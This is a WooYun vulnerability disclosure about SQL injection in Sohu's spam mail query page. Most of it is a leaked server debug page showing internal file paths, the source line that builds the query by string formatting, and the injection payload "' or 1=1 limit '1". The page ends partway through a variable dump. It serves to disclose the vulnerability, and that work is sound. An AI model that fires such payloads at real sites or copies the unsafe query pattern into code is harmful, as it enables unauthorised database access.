搜狐垃圾邮件帮助中心SQL注射漏洞及信息泄漏漏洞

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2011-01569

漏洞标题：搜狐垃圾邮件帮助中心SQL注射漏洞及信息泄漏漏洞

漏洞作者：路人甲

提交时间：2011-03-11 17:22

修复时间：2011-04-11 00:00

公开时间：2011-04-11 00:00

漏洞类型：SQL注射漏洞

危害等级：低

自评Rank：5

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2011-03-11：细节已通知厂商并且等待厂商处理中
2011-03-11：厂商已经确认，细节仅向厂商公开
2011-03-21：细节向核心白帽子及相关领域专家公开
2011-03-31：细节向普通白帽子公开
2011-04-10：细节向实习白帽子公开
2011-04-11：细节向公众公开

简要描述：

搜狐垃圾邮件中心是使用python编写的，但是由于对一些参数过滤不正确以及错误的程序配置，可能泄漏更多信息

详细说明：

HTTP/1.1 500 Internal Server Error
Server: nginx/0.7.65
Date: Fri, 11 Mar 2011 09:11:19 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
f73
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
  <meta http-equiv="content-type" content="text/html; charset=utf-8" />
  <meta name="robots" content="NONE,NOARCHIVE" />
  <title>&lt;class &#39;_mysql_exceptions.ProgrammingError&#39;&gt; at /queryip/</title>
  <style type="text/css">
    html * { padding:0; margin:0; }
    body * { padding:10px 20px; }
    body * * { padding:0; }
    body { font:small sans-serif; }
    body>div { border-bottom:1px solid #ddd; }
    h1 { font-weight:normal; }
    h2 { margin-bottom:.8em; }
    h2 span { font-size:80%; color:#666; font-weight:normal; }
    h3 { margin:1em 0 .5em 0; }
    h4 { margin:0 0 .5em 0; font-weight: normal; }
    table { 
        border:1px solid #ccc; border-collapse: collapse; background:white; }
    tbody td, tbody th { vertical-align:top; padding:2px 3px; }
    thead th { 
        padding:1px 6px 1px 3px; background:#fefefe; text-align:left; 
        font-weight:normal; font-size:11px; border:1px solid #ddd; }
    tbody th { text-align:right; color:#666; padding-right:.5em; }
    table.vars { margin:5px 0 2px 40px; }
    table.vars td, table.req td { font-family:monospace; }
    table td.code { width:100%;}
    table td.code div { overflow:hidden; }
    table.source th { color:#666; }
    table.source td { 
        font-family:monospace; white-space:pre; border-bottom:1px solid #eee; }
    ul.traceback { list-style-type:none; }
    ul.traceback li.frame { margin-bottom:1em; }
    div.context { margin: 10px 0; }
    div.context ol { 
        padding-left:30px; margin:0 10px; list-style-position: inside; }
    div.context ol li { 
        font-family:monospace; white-space:pre; color:#666; cursor:pointer; }
    div.context ol.context-line li { color:black; background-color:#ccc; }
    div.context ol.context-line li span { float: right; }
    div.commands { margin-left: 40px; }
    div.commands a { color:black; text-decoration:none; }
    #summary { background: #ffc; }
    #summary h2 { font-weight: normal; color: #666; }
    #explanation { background:#eee; }
    #template, #template-not-exist { background:#f6f6f6; }
    #template-not-exist ul { margin: 0 0 0 20px; }
    #traceback { background:#eee; }
    #requestinfo { background:#f6f6f6; padding-left:120px; }
    #summary table { border:none; background:transparent; }
    #requestinfo h2, #requestinfo h3 { position:relative; margin-left:-100px; }
    #requestinfo h3 { margin-bottom:-1em; }
    .error { background: #ffc; }
    .specific { color:#cc3300; font-weight:bold; }
  </style>
  <script type="text/javascript">
  //<!--
    function getElementsByClassName(oElm, strTagName, strClassName){
        // Written by Jonathan Snook, http://www.snook.ca/jon; 
        // Add-ons by Robert Nyman, http://www.robertnyman.com
        var arrElements = (strTagName == "*" && document.all)? document.all :
        oElm.getElementsByTagName(strTagName);
        var arrReturnElements = new Array();
        strClassName = strClassName.replace(/\-/g, "\-");
        var oRegExp = new RegExp("(^|\s)" + strClassName + "(\s|$)");
        var oElement;
        for(var i=0; i<arrElements.length; i++){
            oElement = arrElements[i];
            if(oRegExp.test(oElement.className)){
                arrReturnElements.push(oElement);
            }
        }
        return (arrReturnElements)
    }
    function hideAll(elems) {
      for (var e = 0; e < elems.length; e++) {
        elems[e].style.display = 'none';
      }
    }
    window.onload = function() {
      hideAll(getElementsByClassName(document, 'table', 'vars'));
      hideAll(getElementsByClassName(document, 'ol', 'pre-context'));
      hideAll(getElementsByClassName(document, 'ol', 'post-context'));
    }
    function toggle() {
      for (var i = 0; i < arguments.length; i++) {
        var e = document.getElementById(arguments[i]);
        if (e) {
 
1000
         e.style.display = e.style.display == 'none' ? 'block' : 'none';
        }
      }
      return false;
    }
    function varToggle(link, id) {
      toggle('v' + id);
      var s = link.getElementsByTagName('span')[0];
      var uarr = String.fromCharCode(0x25b6);
      var darr = String.fromCharCode(0x25bc);
      s.innerHTML = s.innerHTML == uarr ? darr : uarr;
      return false;
    }
    //-->
  </script>
</head>
<body>
<div id="summary">
  <h1>&lt;class &#39;_mysql_exceptions.ProgrammingError&#39;&gt; at /queryip/</h1>
  <h2>(1064, &quot;You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near &#39;&#39;1&#39;&#39; at line 1&quot;)</h2>
  <table><tr>
    <th>Python</th>
    <td>build/bdist.linux-x86_64/egg/MySQLdb/connections.py in defaulterrorhandler, line 34</td>
  </tr><tr>
    <th>Web</th>
    <td>POST http://mail.sohu.com/queryip/</td>
  </tr></table>
</div>
<div id="traceback">
<h2>Traceback <span>(innermost first)</span></h2>
<ul class="traceback">
<li class="frame">
<code>build/bdist.linux-x86_64/egg/MySQLdb/connections.py

defaulterrorhandler

</div>
<div class="commands">
<a href='#' onclick="return varToggle(this, '346571192')"><span>▶</span> Local vars</a>
</div>
<table class="vars"
id="v346571192"
><thead><tr><th>Variable</th><th>Value</th></tr></thead>
<tbody>
<tr><td>error</td><td class="code"><div>(<class '_mysql_exceptions.ProgrammingError'>,
ProgrammingError(1064, "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' at line 1"))</div></td></tr>
<tr><td>errorclass</td><td class="code"><div><class '_mysql_exceptions.ProgrammingError'></div></td></tr>
<tr><td>errorvalue</td><td class="code"><div>ProgrammingError(1064, "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' at line 1")</div></td></tr>
</tbody>
</table>

</li>
<li class="frame">

build/bdist.linux-x86_64/egg/MySQLdb/cursors.py

execute

</div>
<div class="commands">
<a href='#' onclick="return varToggle(this, '346574000')"><span>▶</span> Local vars</a>
</div>
<table class="vars"
id="v346574000"
><thead><tr><th>Variable</th><th>Value</th></tr></thead>
<tbody>
<tr><td>ListType</td><td class="code"><div><type 'list'></div></td></tr>
<tr><td>TupleType</td><td class="code"><div><type 'tuple'></div></td></tr>
<tr><td>args</td><td class="code"><div>[]</div></td></tr>
<tr><td>charset</td><td class="code"><div>'utf8'</div></td></tr>
<tr><td>db</td><td class="code"><div><weakproxy at 0x14a6ee68 to Connection at 0x143232f0></div></td></tr>
<tr><td>exc</td><td class="code"><div><class '_mysql_exceptions.ProgrammingError'></div></td></tr>
<tr><td>exc_info</td><td class="code"><div><built-in function exc_info></div></td></tr>
<tr><td>query</td><td class="code"><div>"select * from IP where KEYSTR='' OR 1=1 LIMIT '1'"</div></td></tr>
<tr><td>self</td><td class="code"><div><MySQLdb.cursors.Cursor object at 0x14812810></div></td></tr>
<tr><td>value</td><td class="code"><div>ProgrammingError(1064, "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' at line 1")</div></td></tr>
</tbody>
</table>

</li>
<li class="frame">

/opt/sohumc/lib/python2.6/site-packages/DBUtils-1.0-py2.6.egg/DBUtils/SteadyDB.py

tough_method

<div class="context" id="c346571120">
<ol start="442" class="pre-context" id="pre346571120">
<li onclick="toggle('pre346571120', 'post346571120')"> if self._con._maxusage:</li>
<li onclick="toggle('pre346571120', 'post346571120')"> if self._con._usage >= self._con._maxusage:</li>
<
1000
li onclick="toggle('pre346571120', 'post346571120')"> # the connection was used too often</li>
<li onclick="toggle('pre346571120', 'post346571120')"> raise self._con._failure</li>
<li onclick="toggle('pre346571120', 'post346571120')"> if execute:</li>
<li onclick="toggle('pre346571120', 'post346571120')"> self._setsizes()</li>
<li onclick="toggle('pre346571120', 'post346571120')"> method = getattr(self._cursor, name)</li>
</ol>
<ol start="449" class="context-line"><li onclick="toggle('pre346571120', 'post346571120')"> result = method(*args, **kwargs) # try to execute <span>...</span></li></ol>
<ol start='450' class="post-context" id="post346571120">
<li onclick="toggle('pre346571120', 'post346571120')"> if execute:</li>
<li onclick="toggle('pre346571120', 'post346571120')"> self._clearsizes()</li>
<li onclick="toggle('pre346571120', 'post346571120')"> except self._con._failures, error: # execution error</li>
<li onclick="toggle('pre346571120', 'post346571120')"> try:</li>
<li onclick="toggle('pre346571120', 'post346571120')"> cursor2 = self._con._cursor(</li>
<li onclick="toggle('pre346571120', 'post346571120')"> *self._args, **self._kwargs) # open new cursor</li>
</ol>
</div>
<div class="commands">
<a href='#' onclick="return varToggle(this, '346571120')"><span>▶</span> Local vars</a>
</div>
<table class="vars"
id="v346571120"
><thead><tr><th>Variable</th><th>Value</th></tr></thead>
<tbody>
<tr><td>args</td><td class="code"><div>("select * from IP where KEYSTR='' OR 1=1 LIMIT '1'", [])</div></td></tr>
<tr><td>execute</td><td class="code"><div>True</div></td></tr>
<tr><td>kwargs</td><td class="code"><div>{}</div></td></tr>
<tr><td>method</td><td class="code"><div><bound method Cursor.execute of <MySQLdb.cursors.Cursor object at 0x14812810>></div></td></tr>
<tr><td>name</td><td class="code"><div>'execute'</div></td></tr>
<tr><td>self</td><td class="code"><div><MySQLdb.cursors.Cursor object at 0x14812810></div></td></tr>
</tbody>
</table>

</li>
<li class="frame">

/opt/sohumc/lib/python2.6/site-packages/web/db.py

_db_execute

<div class="context" id="c346573136">
<ol start="522" class="pre-context" id="pre346573136">
<li onclick="toggle('pre346573136', 'post346573136')"> self.ctx.dbq_count += 1</li>
<li onclick="toggle('pre346573136', 'post346573136')"> </li>
<li onclick="toggle('pre346573136', 'post346573136')"> try:</li>
<li onclick="toggle('pre346573136', 'post346573136')"> a = time.time()</li>
<li onclick="toggle('pre346573136', 'post346573136')"> paramstyle = getattr(self, 'paramstyle', 'pyformat')</li>
<li onclick="toggle('pre346573136', 'post346573136')"> out = cur.execute(sql_query.query(paramstyle),</li>
<li onclick="toggle('pre346573136', 'post346573136')"> [self._py2sql(x)</li>
</ol>
<ol start="529" class="context-line"><li onclick="toggle('pre346573136', 'post346573136')"> for x in sql_query.values()]) <span>...</span></li></ol>
<ol start='530' class="post-context" id="post346573136">
<li onclick="toggle('pre346573136', 'post346573136')"> b = time.time()</li>
<li onclick="toggle('pre346573136', 'post346573136')"> except:</li>
<li onclick="toggle('pre346573136', 'post346573136')"> if self.printing:</li>
<li onclick="toggle('pre346573136', 'post346573136')"> print >> debug, 'ERR:', str(sql_query)</li>
<li onclick="toggle('pre346573136', 'post346573136')"> if self.ctx.transactions:</li>
<li onclick="toggle('pre346573136', 'post346573136')"> self.ctx.transactions[-1].rollback()</li>
</ol>
</div>
<div class="commands">
<a href='#' onclick="return varToggle(this, '346573136')"><span>▶</span> Local vars</a>
</div>
<table class="vars"
id="v346573136"
><thead><tr><th>Variable</th><th>Value</th></tr></thead>
<tbody>
<tr><td>a</td><td class="code"><div>129983
1000
4677.469094</div></td></tr>
<tr><td>cur</td><td class="code"><div><MySQLdb.cursors.Cursor object at 0x14812810></div></td></tr>
<tr><td>paramstyle</td><td class="code"><div>'pyformat'</div></td></tr>
<tr><td>self</td><td class="code"><div><web.db.MySQLDB instance at 0x2ad35da123b0></div></td></tr>
<tr><td>sql_query</td><td class="code"><div><sql: "select * from IP where KEYSTR='' OR 1=1 LIMIT '1'"></div></td></tr>
</tbody>
</table>

</li>
<li class="frame">

/opt/sohumc/lib/python2.6/site-packages/web/db.py

query

<div class="context" id="c346572704">
<ol start="571" class="pre-context" id="pre346572704">
<li onclick="toggle('pre346572704', 'post346572704')"> </li>
<li onclick="toggle('pre346572704', 'post346572704')"> if not processed and not isinstance(sql_query, SQLQuery):</li>
<li onclick="toggle('pre346572704', 'post346572704')"> sql_query = reparam(sql_query, vars)</li>
<li onclick="toggle('pre346572704', 'post346572704')"> </li>
<li onclick="toggle('pre346572704', 'post346572704')"> if _test: return sql_query</li>
<li onclick="toggle('pre346572704', 'post346572704')"> </li>
<li onclick="toggle('pre346572704', 'post346572704')"> db_cursor = self._db_cursor()</li>
</ol>
<ol start="578" class="context-line"><li onclick="toggle('pre346572704', 'post346572704')"> self._db_execute(db_cursor, sql_query) <span>...</span></li></ol>
<ol start='579' class="post-context" id="post346572704">
<li onclick="toggle('pre346572704', 'post346572704')"> </li>
<li onclick="toggle('pre346572704', 'post346572704')"> if db_cursor.description:</li>
<li onclick="toggle('pre346572704', 'post346572704')"> names = [x[0] for x in db_cursor.description]</li>
<li onclick="toggle('pre346572704', 'post346572704')"> def iterwrapper():</li>
<li onclick="toggle('pre346572704', 'post346572704')"> row = db_cursor.fetchone()</li>
<li onclick="toggle('pre346572704', 'post346572704')"> while row:</li>
</ol>
</div>
<div class="commands">
<a href='#' onclick="return varToggle(this, '346572704')"><span>▶</span> Local vars</a>
</div>
<table class="vars"
id="v346572704"
><thead><tr><th>Variable</th><th>Value</th></tr></thead>
<tbody>
<tr><td>_test</td><td class="code"><div>False</div></td></tr>
<tr><td>db_cursor</td><td class="code"><div><MySQLdb.cursors.Cursor object at 0x14812810></div></td></tr>
<tr><td>processed</td><td class="code"><div>False</div></td></tr>
<tr><td>self</td><td class="code"><div><web.db.MySQLDB instance at 0x2ad35da123b0></div></td></tr>
<tr><td>sql_query</td><td class="code"><div><sql: "select * from IP where KEYSTR='' OR 1=1 LIMIT '1'"></div></td></tr>
<tr><td>vars</td><td class="code"><div>{}</div></td></tr>
</tbody>
</table>

</li>
<li class="frame">

/root/mail-info/code.py

queryFrmDb

<div class="context" id="c346571696">
<ol start="112" class="pre-context" id="pre346571696">
<li onclick="toggle('pre346571696', 'post346571696')"> result = queryFrmDb("SENDER",input.email)</li>
<li onclick="toggle('pre346571696', 'post346571696')"> if len(result) == 0:</li>
<li onclick="toggle('pre346571696', 'post346571696')"> return simplejson.dumps({"result": u"%s涓嶅湪榛戝悕鍗曚腑!" %input.email})</li>
<li onclick="toggle('pre346571696', 'post346571696')"> else:</li>
<li onclick="toggle('pre346571696', 'post346571696')"> return simplejson.dumps({"info": result})</li>
<li onclick="toggle('pre346571696', 'post346571696')">def queryFrmDb(table,key):</li>
<li onclick="toggle('pre346571696', 'post346571696')"> curtime = time.time()</li>
</ol>
<ol start="119" class="context-line"><li onclick="toggle('pre346571696', 'post346571696')"> rs = db.query("select * from %s where KEYSTR='%s'" %(table,key.upper())) <span>...</span></li></ol>
<ol start='120'
1000
class="post-context" id="post346571696">
<li onclick="toggle('pre346571696', 'post346571696')"> result=[]</li>
<li onclick="toggle('pre346571696', 'post346571696')"> for r in rs:</li>
<li onclick="toggle('pre346571696', 'post346571696')"> d = dict()</li>
<li onclick="toggle('pre346571696', 'post346571696')"> if r.ENDTIME == 0:</li>
<li onclick="toggle('pre346571696', 'post346571696')"> d['result'] = u"<dd>%s鍦ㄩ粦鍚嶅崟涓紝灞炰簬姘镐箙琚</dd>" % key</li>
<li onclick="toggle('pre346571696', 'post346571696')"> else:</li>
</ol>
</div>
<div class="commands">
<a href='#' onclick="return varToggle(this, '346571696')"><span>▶</span> Local vars</a>
</div>
<table class="vars"
id="v346571696"
><thead><tr><th>Variable</th><th>Value</th></tr></thead>
<tbody>
<tr><td>curtime</td><td class="code"><div>1299834677.468873</div></td></tr>
<tr><td>key</td><td class="code"><div>u"' or 1=1 limit '1"</div></td></tr>
<tr><td>table</td><td class="code"><div>'IP'</div></td></tr>
</tbody>
</table>

</li>
<li class="frame">

/root/mail-info/code.py

POST

<div class="context" id="c346574432">
<ol start="207" class="pre-context" id="pre346574432">
<li onclick="toggle('pre346574432', 'post346574432')"></li>
<li onclick="toggle('pre346574432', 'post346574432')"> def POST(self, *arg):</li>
<li onclick="toggle('pre346574432', 'post346574432')"> input = web.input()</li>
<li onclick="toggle('pre346574432', 'post346574432')"> session._cleanup()</li>
<li onclick="toggle('pre346574432', 'post346574432')"> session._load()</li>
<li onclick="toggle('pre346574432', 'post346574432')"> if input.code != session.captcha:</li>
<li onclick="toggle('pre346574432', 'post346574432')"> return simplejson.dumps({'error': u'鍥惧舰楠岃瘉鐮佽緭鍏ヤ笉瀵癸紝璇烽噸鏂拌緭鍏?#39;})</li>
</ol>
<ol start="214" class="context-line"><li onclick="toggle('pre346574432', 'post346574432')"> result = queryFrmDb("IP",input.ip) <span>...</span></li></ol>
<ol start='215' class="post-context" id="post346574432">
<li onclick="toggle('pre346574432', 'post346574432')"> if len(result) == 0:</li>
<li onclick="toggle('pre346574432', 'post346574432')"> return simplejson.dumps({"result": u"%s涓嶅湪榛戝悕鍗曚腑!" %input.ip})</li>
<li onclick="toggle('pre346574432', 'post346574432')"> else:</li>
<li onclick="toggle('pre346574432', 'post346574432')"> return simplejson.dumps({"info": result})</li>
<li onclick="toggle('pre346574432', 'post346574432')"></li>
<li onclick="toggle('pre346574432', 'post346574432')">class customer(sitepage):</li>
</ol>
</div>
<div class="commands">
<a href='#' onclick="return varToggle(this, '346574432')"><span>▶</span> Local vars</a>
</div>
<table class="vars"
id="v346574432"
><thead><tr><th>Variable</th><th>Value</th></tr></thead>
<tbody>
<tr><td>arg</td><td class="code"><div>(u'',)</div></td></tr>
<tr><td>input</td><td class="code"><div><Storage {'ip': u"' or 1=1 limit '1", 'code': u'science'}></div></td></tr>
<tr><td>self</td><td class="code"><div><code.queryip instance at 0x14a84f80></div></td></tr>
</tbody>
</table>

</li>
<li class="frame">

/opt/sohumc/lib/python2.6/site-packages/web/application.py

handle_class

<div class="context" id="c346570832">
<ol start="352" class="pre-context" id="pre346570832">
<li onclick="toggle('pre346570832', 'post346570832')"> def handle_class(cls):</li>
<li onclick="toggle('pre346570832', 'post346570832')"> meth = web.ctx.method</li>
<li onclick="toggle('pre346570832', 'post346570832')"> if meth == 'HEAD' and not hasattr(cls, meth):</li>
<li onclick="toggle('pre346570832', 'post346570832')"> meth = 'GET'</li>
<li onclick="toggle('pre346570832', 'post346570832')"> if not hasattr(cls,
1000
meth):</li>
<li onclick="toggle('pre346570832', 'post346570832')"> raise web.nomethod(cls)</li>
<li onclick="toggle('pre346570832', 'post346570832')"> tocall = getattr(cls(), meth)</li>
</ol>
<ol start="359" class="context-line"><li onclick="toggle('pre346570832', 'post346570832')"> return tocall(*args) <span>...</span></li></ol>
<ol start='360' class="post-context" id="post346570832">
<li onclick="toggle('pre346570832', 'post346570832')"> </li>
<li onclick="toggle('pre346570832', 'post346570832')"> def is_class(o): return isinstance(o, (types.ClassType, type))</li>
<li onclick="toggle('pre346570832', 'post346570832')"> </li>
<li onclick="toggle('pre346570832', 'post346570832')"> if f is None:</li>
<li onclick="toggle('pre346570832', 'post346570832')"> raise web.notfound()</li>
<li onclick="toggle('pre346570832', 'post346570832')"> elif isinstance(f, application):</li>
</ol>
</div>
<div class="commands">
<a href='#' onclick="return varToggle(this, '346570832')"><span>▶</span> Local vars</a>
</div>
<table class="vars"
id="v346570832"
><thead><tr><th>Variable</th><th>Value</th></tr></thead>
<tbody>
<tr><td>args</td><td class="code"><div>[u'']</div></td></tr>
<tr><td>cls</td><td class="code"><div><class code.queryip at 0x2ad35d9fcfb0></div></td></tr>
<tr><td>meth</td><td class="code"><div>u'POST'</div></td></tr>
<tr><td>tocall</td><td class="code"><div><bound method queryip.POST of <code.queryip instance at 0x14a84f80>></div></td></tr>
</tbody>
</table>

</li>
<li class="frame">

/opt/sohumc/lib/python2.6/site-packages/web/application.py

_delegate

<div class="context" id="c346572992">
<ol start="377" class="pre-context" id="pre346572992">
<li onclick="toggle('pre346572992', 'post346572992')"> elif '.' in f:</li>
<li onclick="toggle('pre346572992', 'post346572992')"> x = f.split('.')</li>
<li onclick="toggle('pre346572992', 'post346572992')"> mod, cls = '.'.join(x[:-1]), x[-1]</li>
<li onclick="toggle('pre346572992', 'post346572992')"> mod = __import__(mod, globals(), locals(), [""])</li>
<li onclick="toggle('pre346572992', 'post346572992')"> cls = getattr(mod, cls)</li>
<li onclick="toggle('pre346572992', 'post346572992')"> else:</li>
<li onclick="toggle('pre346572992', 'post346572992')"> cls = fvars[f]</li>
</ol>
<ol start="384" class="context-line"><li onclick="toggle('pre346572992', 'post346572992')"> return handle_class(cls) <span>...</span></li></ol>
<ol start='385' class="post-context" id="post346572992">
<li onclick="toggle('pre346572992', 'post346572992')"> elif hasattr(f, '__call__'):</li>
<li onclick="toggle('pre346572992', 'post346572992')"> return f()</li>
<li onclick="toggle('pre346572992', 'post346572992')"> else:</li>
<li onclick="toggle('pre346572992', 'post346572992')"> return web.notfound()</li>
<li onclick="toggle('pre346572992', 'post346572992')"></li>
<li onclick="toggle('pre346572992', 'post346572992')"> def _match(self, mapping, value):</li>
</ol>
</div>
<div class="commands">
<a href='#' onclick="return varToggle(this, '346572992')"><span>▶</span> Local vars</a>
</div>
<table class="vars"
id="v346572992"
><thead><tr><th>Variable</th><th>Value</th></tr></thead>
<tbody>
<tr><td>args</td><td class="code"><div>[u'']</div></td></tr>
<tr><td>cls</td><td class="code"><div><class code.queryip at 0x2ad35d9fcfb0></div></td></tr>
<tr><td>f</td><td class="code"><div>u'queryip'</div></td></tr>
<tr><td>fvars</td><td class="code"><div>{'MySQLdb': <module 'MySQLdb' from '/opt/sohumc/lib/python2.6/site-packages/MySQL_python-1.2.2-py2.6-linux-x86_64.egg/MySQLdb/__init__.pyc'>,
'__builtins__': {'ArithmeticError': <type 'exceptions.ArithmeticError'>,
&#
1000
39;AssertionError': <type 'exceptions.AssertionError'>,
'AttributeError': <type 'exceptions.AttributeError'>,
'BaseException': <type 'exceptions.BaseException'>,
'BufferError': <type 'exceptions.BufferError'>,
'BytesWarning': <type 'exceptions.BytesWarning'>,
'DeprecationWarning': <type 'exceptions.DeprecationWarning'>,
'EOFError': <type 'exceptions.EOFError'>,
'Ellipsis': Ellipsis,
'EnvironmentError': <type 'exceptions.EnvironmentError'>,
'Exception': <type 'exceptions.Exception'>,
'False': False,
'FloatingPointError': <type 'exceptions.FloatingPointError'>,
'FutureWarning': <type 'exceptions.FutureWarning'>,
'GeneratorExit': <type 'exceptions.GeneratorExit'>,
'IOError': <type 'exceptions.IOError'>,
'ImportError': <type 'exceptions.ImportError'>,
'ImportWarning': <type 'exceptions.ImportWarning'>,
'IndentationError': <type 'exceptions.IndentationError'>,
'IndexError': <type 'exceptions.IndexError'>,
'KeyError': <type 'exceptions.KeyError'>,
'KeyboardInterrupt': <type 'exceptions.KeyboardInterrupt'>,
'LookupError': <type 'exceptions.LookupError'>,
'MemoryError': <type 'exceptions.MemoryError'>,
'NameError': <type 'exceptions.NameError'>,
'None': None,
'NotImplemented': NotImplemented,
'NotImplementedError': <type 'exceptions.NotImplementedError'>,
'OSError': <type 'exceptions.OSError'>,
'OverflowError': <type 'exceptions.OverflowError'>,
'PendingDeprecationWarning': <type 'exceptions.PendingDeprecationWarning'>,
'ReferenceError': <type 'exceptions.ReferenceError'>,
'RuntimeError': <type 'exceptions.RuntimeError'>,
'RuntimeWarning': <type 'exceptions.RuntimeWarning'>,
'StandardError': <type 'exceptions.StandardError'>,
'StopIteration': <type 'exceptions.StopIteration'>,
'SyntaxError': <type 'exceptions.SyntaxError'>,
'SyntaxWarning': <type 'exceptions.SyntaxWarning'>,
'SystemError': <type 'exceptions.SystemError'>,
'SystemExit': <type 'exceptions.SystemExit'>,
'TabError': <type 'exceptions.TabError'>,
'True': True,
'TypeError': <type 'exceptions.TypeError'>,
'UnboundLocalError': <type 'exceptions.UnboundLocalError'>,
'UnicodeDecodeError': <type 'exceptions.UnicodeDecodeError'>,
'UnicodeEncodeError': <type 'exceptions.UnicodeEncodeError'>,
'UnicodeError': <type 'exceptions.UnicodeError'>,
'UnicodeTranslateError': <type 'exceptions.UnicodeTranslateError'>,

1000
'UnicodeWarning': <type 'exceptions.UnicodeWarning'>,
'UserWarning': <type 'exceptions.UserWarning'>,
'ValueError': <type 'exceptions.ValueError'>,
'Warning': <type 'exceptions.Warning'>,
'ZeroDivisionError': <type 'exceptions.ZeroDivisionError'>,
'__debug__': True,
'__doc__': "Built-in functions, exceptions, and other objects.\n\nNoteworthy: None is the `nil' object; Ellipsis represents `...' in slices.",
'__import__': <built-in function __import__>,
'__name__': '__builtin__',
'__package__': None,
'abs': <built-in function abs>,
'all': <built-in function all>,
'any': <built-in function any>,
'apply': <built-in function apply>,
'basestring': <type 'basestring'>,
'bin': <built-in function bin>,
'bool': <type 'bool'>,
'buffer': <type 'buffer'>,
'bytearray': <type 'bytearray'>,
'bytes': <type 'str'>,
'callable': <built-in function callable>,
'chr': <built-in function chr>,
'classmethod': <type 'classmethod'>,
'cmp': <built-in function cmp>,
'coerce': <built-in function coerce>,
'compile': <built-in function compile>,
'complex': <type 'complex'>,
'copyright': Copyright (c) 2001-2008 Python Software Foundation.
All Rights Reserved.
Copyright (c) 2000 BeOpen.com.
All Rights Reserved.
Copyright (c) 1995-2001 Corporation for National Research Initiatives.
All Rights Reserved.
Copyright (c) 1991-1995 Stichting Mathematisch Centrum, Amsterdam.
All Rights Reserved.,
'credits': Thanks to CWI, CNRI, BeOpen.com, Zope Corporation and a cast of thousands
for supporting Python development. See www.python.org for more information.,
'delattr': <built-in function delattr>,
'dict': <type 'dict'>,
'dir': <built-in function dir>,
'divmod': <built-in function divmod>,
'enumerate': <type 'enumerate'>,
'eval': <built-in function eval>,
'execfile': <built-in function execfile>,
'exit': Use exit() or Ctrl-D (i.e. EOF) to exit,
'file': <type 'file'>,
'filter': <built-in function filter>,
'float': <type 'float'>,
'format': <built-in function format>,
'frozenset': <type 'frozenset'>,
'getattr': <built-in function getattr>,
'globals': <built-in function globals>,
'hasattr': <built-in function hasattr>,
'hash': <built-in function hash>,
'help': Type help() for interactive help, or help(object) for help about object.,
'hex': <built-in function hex>,
'id': <built-in function id>,
'input': <built-in function input>,
'int': <type 'int'>,

2000
'intern': <built-in function intern>,
'isinstance': <built-in function isinstance>,
'issubclass': <built-in function issubclass>,
'iter': <built-in function iter>,
'len': <built-in function len>,
'license': Type license() to see the full license text,
'list': <type 'list'>,
'locals': <built-in function locals>,
'long': <type 'long'>,
'map': <built-in function map>,
'max': <built-in function max>,
'min': <built-in function min>,
'next': <built-in function next>,
'object': <type 'object'>,
'oct': <built-in function oct>,
'open': <built-in function open>,
'ord': <built-in function ord>,
'pow': <built-in function pow>,
'print': <built-in function print>,
'property': <type 'property'>,
'quit': Use quit() or Ctrl-D (i.e. EOF) to exit,
'range': <built-in function range>,
'raw_input': <built-in function raw_input>,
'reduce': <built-in function reduce>,
'reload': <built-in function reload>,
'repr': <built-in function repr>,
'reversed': <type 'reversed'>,
'round': <built-in function round>,
'set': <type 'set'>,
'setattr': <built-in function setattr>,
'slice': <type 'slice'>,
'sorted': <built-in function sorted>,
'staticmethod': <type 'staticmethod'>,
'str': <type 'str'>,
'sum': <built-in function sum>,
'super': <type 'super'>,
'tuple': <type 'tuple'>,
'type': <type 'type'>,
'unichr': <built-in function unichr>,
'unicode': <type 'unicode'>,
'vars': <built-in function vars>,
'xrange': <type 'xrange'>,
'zip': <built-in function zip>},
'__doc__': None,
'__file__': '/root/mail-info/code.pyc',
'__name__': 'code',
'__package__': None,
'about': <class code.about at 0x2ad35da180b0>,
'app': <web.application.application instance at 0x2ad35da12320>,
'captcha': <class code.captcha at 0x2ad35da18110>,
'customer': <class code.customer at 0x2ad35da18050>,
'db': <web.db.MySQLDB instance at 0x2ad35da123b0>,
'hello': <class code.hello at 0x2ad35d9fcd70>,
'policy': <class code.policy at 0x2ad35d9fce30>,
'postmaster': <class code.postmaster at 0x2ad35d9fce90>,
'queryFrmBlack': <function queryFrmBlack at 0x2ad35da14668>,
'queryFrmDb': <function queryFrmDb at 0x2ad35da14140>,
'queryip': <class code.queryip at 0x2ad35d9fcfb0>,
'queryreject': <class code.queryreject at 0x2ad35d9fcf50>,
'querysender': <class code.querysender at 0x2ad35d9fcef0>,
're': <module 're' from '/opt/sohumc/lib/python2.6/re.pyc'>,
'reject_info': {'BLACKIP': ' \xe7\xae\xa1\xe7\x90\x86\xe4\xba\xba\xe5\x91\x98\xe5\xb0\x86\xe5\xae\x83\xe5\x8a\xa0\xe5\x85\xa5\xe9\xbb\x91\xe5\x90\x8d\xe5\x8d\x95',
'BLACKRCPT': ' \xe7\xae\xa1\xe7\x90\x86\xe4\xba\xba\xe5\x91\x98\xe5\xb0\x86\xe5\xae\x83\xe5\x8a\xa0\xe5\x85\xa5\xe6\x94\xb6\xe4\xbb\xb6\xe4\xba\xba\xe9\xbb\x91\xe5\x90\x8d\xe5\x8d\x95',
'BLACKSENDER': ' \xe7\xae\xa1\xe7\x90\x86\xe4\xba\xba\xe5\x91\x98\xe5\xb0\x86\xe5\xae\x83\xe5\x8a\xa0\xe5\x85\xa5\xe9\xbb\x91\xe5\x90\x8d\xe5\x8d\x95',
